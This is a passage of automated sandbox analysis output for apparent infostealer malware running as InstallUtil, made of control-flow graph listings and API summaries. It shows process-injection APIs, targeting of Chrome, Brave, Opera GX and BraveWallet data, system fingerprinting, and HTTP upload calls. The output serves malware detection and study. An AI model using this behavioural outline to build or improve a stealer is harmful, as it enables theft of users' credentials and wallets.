410609 3 API calls 92444->92445 92446 40655f 92445->92446 92447 41058d lstrcpyA 92446->92447 92448 40656a 92447->92448 92449 410609 3 API calls 92448->92449 92450 40658b 92449->92450 92451 41058d lstrcpyA 92450->92451 92452 406596 92451->92452 92453 410609 3 API calls 92452->92453 92454 4065b7 92453->92454 92455 41058d lstrcpyA 92454->92455 92456 4065c2 92455->92456 92457 4105c7 2 API calls 92456->92457 92458 4065e1 92457->92458 92459 41058d lstrcpyA 92458->92459 92460 4065ec 92459->92460 92461 4065f7 lstrlenA lstrlenA GetProcessHeap HeapAlloc lstrlenA 92460->92461 93385 427050 92461->93385 92464 427050 _memmove 92465 406667 lstrlenA HttpSendRequestA 92464->92465 92466 4066d2 InternetReadFile 92465->92466 92467 4066ec InternetCloseHandle 92466->92467 92469 406692 92466->92469 92467->92366 92468 410609 3 API calls 92468->92469 92469->92466 92469->92467 92469->92468 92470 41058d lstrcpyA 92469->92470 92470->92469 92472 4134cc 92471->92472 92473 41346e 92471->92473 92472->91135 92474 410549 2 API calls 92473->92474 92475 4134b6 strtok_s 92473->92475 92476 410549 2 API calls 92473->92476 92474->92475 92475->92472 92475->92473 92476->92473 92480 413286 92477->92480 92478 413385 92478->91149 92479 413332 StrCmpCA 92479->92480 92480->92478 92480->92479 92481 410549 2 API calls 92480->92481 92482 413367 strtok_s 92480->92482 92483 413301 StrCmpCA 92480->92483 92484 4132dc StrCmpCA 92480->92484 92485 4132ab StrCmpCA 92480->92485 92481->92480 92482->92480 92483->92480 92484->92480 92485->92480 92487 413434 92486->92487 92489 4133bc 92486->92489 92487->91161 92488 4133e2 StrCmpCA 92488->92489 92489->92488 92490 410549 2 API calls 92489->92490 92491 41341a strtok_s 92489->92491 92492 410549 2 API calls 92489->92492 92490->92491 92491->92487 92491->92489 92492->92489 92494 4104e7 lstrcpyA 92493->92494 92495 413b9f 92494->92495 92496 410609 3 API calls 92495->92496 92497 413baf 92496->92497 92498 41058d lstrcpyA 92497->92498 92499 413bb7 92498->92499 92500 410609 3 API calls 
92499->92500 92501 413bcf 92500->92501 92502 41058d lstrcpyA 92501->92502 92503 413bd7 92502->92503 92504 410609 3 API calls 92503->92504 92505 413bef 92504->92505 92506 41058d lstrcpyA 92505->92506 92507 413bf7 92506->92507 92508 410609 3 API calls 92507->92508 92509 413c0f 92508->92509 92510 41058d lstrcpyA 92509->92510 92511 413c17 92510->92511 92512 410609 3 API calls 92511->92512 92513 413c2f 92512->92513 92514 41058d lstrcpyA 92513->92514 92515 413c37 92514->92515 93392 410cc0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 92515->93392 92518 410609 3 API calls 92519 413c50 92518->92519 92520 41058d lstrcpyA 92519->92520 92521 413c58 92520->92521 92522 410609 3 API calls 92521->92522 92523 413c70 92522->92523 92524 41058d lstrcpyA 92523->92524 92525 413c78 92524->92525 92526 410609 3 API calls 92525->92526 92527 413c90 92526->92527 92528 41058d lstrcpyA 92527->92528 92529 413c98 92528->92529 93395 4115d4 92529->93395 92532 410609 3 API calls 92533 413cb1 92532->92533 92534 41058d lstrcpyA 92533->92534 92535 413cb9 92534->92535 92536 410609 3 API calls 92535->92536 92537 413cd1 92536->92537 92538 41058d lstrcpyA 92537->92538 92539 413cd9 92538->92539 92540 410609 3 API calls 92539->92540 92541 413cf1 92540->92541 92542 41058d lstrcpyA 92541->92542 92543 413cf9 92542->92543 92544 411684 11 API calls 92543->92544 92545 413d09 92544->92545 92546 4105c7 2 API calls 92545->92546 92547 413d16 92546->92547 92548 41058d lstrcpyA 92547->92548 92549 413d1e 92548->92549 92550 410609 3 API calls 92549->92550 92551 413d3e 92550->92551 92552 41058d lstrcpyA 92551->92552 92553 413d46 92552->92553 92554 410609 3 API calls 92553->92554 92555 413d5e 92554->92555 92556 41058d lstrcpyA 92555->92556 92557 413d66 92556->92557 92558 4109a2 19 API calls 92557->92558 92559 413d76 92558->92559 92560 4105c7 2 API calls 92559->92560 92561 413d83 92560->92561 92562 41058d lstrcpyA 92561->92562 92563 413d8b 92562->92563 92564 410609 3 API calls 92563->92564 92565 413dab 92564->92565 92566 
41058d lstrcpyA 92565->92566 92567 413db3 92566->92567 92568 410609 3 API calls 92567->92568 92569 413dcb 92568->92569 92570 41058d lstrcpyA 92569->92570 92571 413dd3 92570->92571 92572 413ddb GetCurrentProcessId 92571->92572 93402 41224a OpenProcess 92572->93402 92575 4105c7 2 API calls 92576 413df8 92575->92576 92577 41058d lstrcpyA 92576->92577 92578 413e00 92577->92578 92579 410609 3 API calls 92578->92579 92580 413e20 92579->92580 92581 41058d lstrcpyA 92580->92581 92582 413e28 92581->92582 92583 410609 3 API calls 92582->92583 92584 413e40 92583->92584 92585 41058d lstrcpyA 92584->92585 92586 413e48 92585->92586 92587 410609 3 API calls 92586->92587 92588 413e60 92587->92588 92589 41058d lstrcpyA 92588->92589 92590 413e68 92589->92590 92591 410609 3 API calls 92590->92591 92592 413e80 92591->92592 92593 41058d lstrcpyA 92592->92593 92594 413e88 92593->92594 93409 410b30 GetProcessHeap HeapAlloc 92594->93409 92597 410609 3 API calls 92598 413ea1 92597->92598 92599 41058d lstrcpyA 92598->92599 92600 413ea9 92599->92600 92601 410609 3 API calls 92600->92601 92602 413ec1 92601->92602 92603 41058d lstrcpyA 92602->92603 92604 413ec9 92603->92604 92605 410609 3 API calls 92604->92605 92606 413ee1 92605->92606 92607 41058d lstrcpyA 92606->92607 92608 413ee9 92607->92608 93416 411807 92608->93416 92611 4105c7 2 API calls 92612 413f06 92611->92612 92613 41058d lstrcpyA 92612->92613 92614 413f0e 92613->92614 92615 410609 3 API calls 92614->92615 92616 413f2e 92615->92616 92617 41058d lstrcpyA 92616->92617 92618 413f36 92617->92618 92619 410609 3 API calls 92618->92619 92620 413f4e 92619->92620 92621 41058d lstrcpyA 92620->92621 92622 413f56 92621->92622 93433 411997 92622->93433 92624 413f67 92625 4105c7 2 API calls 92624->92625 92626 413f75 92625->92626 92627 41058d lstrcpyA 92626->92627 92628 413f7d 92627->92628 92629 410609 3 API calls 92628->92629 92630 413f9d 92629->92630 92631 41058d lstrcpyA 92630->92631 92632 413fa5 92631->92632 92633 410609 3 API calls 
92632->92633 92634 413fbd 92633->92634 92635 41058d lstrcpyA 92634->92635 92636 413fc5 92635->92636 92637 410c85 3 API calls 92636->92637 92638 413fd2 92637->92638 92639 410609 3 API calls 92638->92639 92640 413fde 92639->92640 92641 41058d lstrcpyA 92640->92641 92642 413fe6 92641->92642 92643 410609 3 API calls 92642->92643 92644 413ffe 92643->92644 92645 41058d lstrcpyA 92644->92645 92646 414006 92645->92646 92647 410609 3 API calls 92646->92647 92648 41401e 92647->92648 92649 41058d lstrcpyA 92648->92649 92650 414026 92649->92650 93448 410c53 GetProcessHeap HeapAlloc GetUserNameA 92650->93448 92652 414033 92653 410609 3 API calls 92652->92653 92654 41403f 92653->92654 92655 41058d lstrcpyA 92654->92655 92656 414047 92655->92656 92657 410609 3 API calls 92656->92657 92658 41405f 92657->92658 92659 41058d lstrcpyA 92658->92659 92660 414067 92659->92660 92661 410609 3 API calls 92660->92661 92662 41407f 92661->92662 92663 41058d lstrcpyA 92662->92663 92664 414087 92663->92664 93449 411563 7 API calls 92664->93449 92667 4105c7 2 API calls 92668 4140a6 92667->92668 92669 41058d lstrcpyA 92668->92669 92670 4140ae 92669->92670 92671 410609 3 API calls 92670->92671 92672 4140ce 92671->92672 92673 41058d lstrcpyA 92672->92673 92674 4140d6 92673->92674 92675 410609 3 API calls 92674->92675 92676 4140ee 92675->92676 92677 41058d lstrcpyA 92676->92677 92678 4140f6 92677->92678 93452 410ddb 92678->93452 92681 4105c7 2 API calls 92682 414113 92681->92682 92683 41058d lstrcpyA 92682->92683 92684 41411b 92683->92684 92685 410609 3 API calls 92684->92685 92686 41413b 92685->92686 92687 41058d lstrcpyA 92686->92687 92688 414143 92687->92688 92689 410609 3 API calls 92688->92689 92690 41415b 92689->92690 92691 41058d lstrcpyA 92690->92691 92692 414163 92691->92692 92693 410cc0 9 API calls 92692->92693 92694 414170 92693->92694 92695 410609 3 API calls 92694->92695 92696 41417c 92695->92696 92697 41058d lstrcpyA 92696->92697 92698 414184 92697->92698 92699 410609 3 API calls 
92698->92699 92700 41419c 92699->92700 92701 41058d lstrcpyA 92700->92701 92702 4141a4 92701->92702 92703 410609 3 API calls 92702->92703 92704 4141bc 92703->92704 92705 41058d lstrcpyA 92704->92705 92706 4141c4 92705->92706 93464 410d2e GetProcessHeap HeapAlloc GetTimeZoneInformation 92706->93464 92709 410609 3 API calls 92710 4141dd 92709->92710 92711 41058d lstrcpyA 92710->92711 92712 4141e5 92711->92712 92713 410609 3 API calls 92712->92713 92714 4141fd 92713->92714 92715 41058d lstrcpyA 92714->92715 92716 414205 92715->92716 92717 410609 3 API calls 92716->92717 92718 41421d 92717->92718 92719 41058d lstrcpyA 92718->92719 92720 414225 92719->92720 92721 410609 3 API calls 92720->92721 92722 41423d 92721->92722 92723 41058d lstrcpyA 92722->92723 92724 414245 92723->92724 93469 410f51 GetProcessHeap HeapAlloc RegOpenKeyExA 92724->93469 92726 414252 92727 410609 3 API calls 92726->92727 92728 41425e 92727->92728 92729 41058d lstrcpyA 92728->92729 92730 414266 92729->92730 92731 410609 3 API calls 92730->92731 92732 41427e 92731->92732 92733 41058d lstrcpyA 92732->92733 92734 414286 92733->92734 92735 410609 3 API calls 92734->92735 92736 41429e 92735->92736 92737 41058d lstrcpyA 92736->92737 92738 4142a6 92737->92738 93472 411007 92738->93472 92741 410609 3 API calls 92742 4142bf 92741->92742 92743 41058d lstrcpyA 92742->92743 92744 4142c7 92743->92744 92745 410609 3 API calls 92744->92745 92746 4142df 92745->92746 92747 41058d lstrcpyA 92746->92747 92748 4142e7 92747->92748 92749 410609 3 API calls 92748->92749 92750 4142ff 92749->92750 92751 41058d lstrcpyA 92750->92751 92752 414307 92751->92752 93489 410fba GetSystemInfo wsprintfA 92752->93489 92755 410609 3 API calls 92756 414320 92755->92756 92757 41058d lstrcpyA 92756->92757 92758 414328 92757->92758 92759 410609 3 API calls 92758->92759 92760 414340 92759->92760 92761 41058d lstrcpyA 92760->92761 92762 414348 92761->92762 92763 410609 3 API calls 92762->92763 92764 414360 92763->92764 92765 41058d lstrcpyA 

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                  • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                  • API String ID: 2238633743-2740034357
                                                                                                                  • Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                                  • Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
                                                                                                                  • Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                                  • Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • wsprintfA.USER32 ref: 00414D1C
                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                                  • _memset.LIBCMT ref: 00414D4F
                                                                                                                  • _memset.LIBCMT ref: 00414D60
                                                                                                                  • StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                                  • StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                                  • wsprintfA.USER32 ref: 00414DC2
                                                                                                                  • StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                                  • wsprintfA.USER32 ref: 00414DFF
                                                                                                                  • wsprintfA.USER32 ref: 00414E16
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • _memset.LIBCMT ref: 00414E28
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                                  • strtok_s.MSVCRT ref: 00414E82
                                                                                                                  • _memset.LIBCMT ref: 00414E94
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00414EA9
                                                                                                                  • strtok_s.MSVCRT ref: 00414EC2
                                                                                                                  • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
                                                                                                                  • DeleteFileA.KERNEL32(?,00436A28,0043661D), ref: 00414F90
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 00414FA0
                                                                                                                    • Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
                                                                                                                  • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00414FC1
                                                                                                                  • strtok_s.MSVCRT ref: 00414FE7
                                                                                                                  • FindNextFileA.KERNELBASE(?,?), ref: 00415105
                                                                                                                  • FindClose.KERNEL32(?), ref: 00415125
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                  • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                  • API String ID: 956187361-332874205
                                                                                                                  • Opcode ID: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                                  • Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
                                                                                                                  • Opcode Fuzzy Hash: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                                  • Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
                                                                                                                  • StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
                                                                                                                  • StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01
                                                                                                                    • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                    • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                  • StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
                                                                                                                  • StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
                                                                                                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A0EF
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040A1BE
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040A1FC
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040A266
                                                                                                                  • StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040A35C
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A41C
                                                                                                                  • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040A522
                                                                                                                    • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
                                                                                                                    • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF
                                                                                                                    • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
                                                                                                                    • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040A553
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A613
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040A6AA
                                                                                                                    • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                  • FindNextFileA.KERNEL32(?,?), ref: 0040A76E
                                                                                                                  • FindClose.KERNEL32(?), ref: 0040A782
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
                                                                                                                  • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                  • API String ID: 4173076446-1189830961
                                                                                                                  • Opcode ID: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                                                  • Instruction ID: a20a882fd3e2cf19c19de5c34085d4fd9f009afcaba82f6ce1c70ae1e393a276
                                                                                                                  • Opcode Fuzzy Hash: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                                                  • Instruction Fuzzy Hash: 7D422A3194012D9BCF21FB65DD46BCD7775AF04308F4101AAB848B31A2DB79AED98F89

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 00408941
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
                                                                                                                    • Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
                                                                                                                    • Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
                                                                                                                    • Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
                                                                                                                  • StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
                                                                                                                  • StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00408CF0
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00408D0B
                                                                                                                    • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                    • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 00408D4E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                  • String ID: ERROR_RUN_EXTRACTOR
                                                                                                                  • API String ID: 2819533921-2709115261
                                                                                                                  • Opcode ID: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                                  • Instruction ID: 65d458a2be874082b650ad6ccfc12f730853009eff9118d7dbcfdf0fd3eb137e
                                                                                                                  • Opcode Fuzzy Hash: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                                  • Instruction Fuzzy Hash: CAE14F71A00209AFCF01FFA1ED4A9DD7B76AF04309F10502AF541B71A1DB796E958F98

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C6BF688,00001000), ref: 6C6335D5
                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6335E0
                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 6C6335FD
                                                                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C63363F
                                                                                                                  • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C63369F
                                                                                                                  • __aulldiv.LIBCMT ref: 6C6336E4
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C633773
                                                                                                                  • EnterCriticalSection.KERNEL32(6C6BF688), ref: 6C63377E
                                                                                                                  • LeaveCriticalSection.KERNEL32(6C6BF688), ref: 6C6337BD
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C6337C4
                                                                                                                  • EnterCriticalSection.KERNEL32(6C6BF688), ref: 6C6337CB
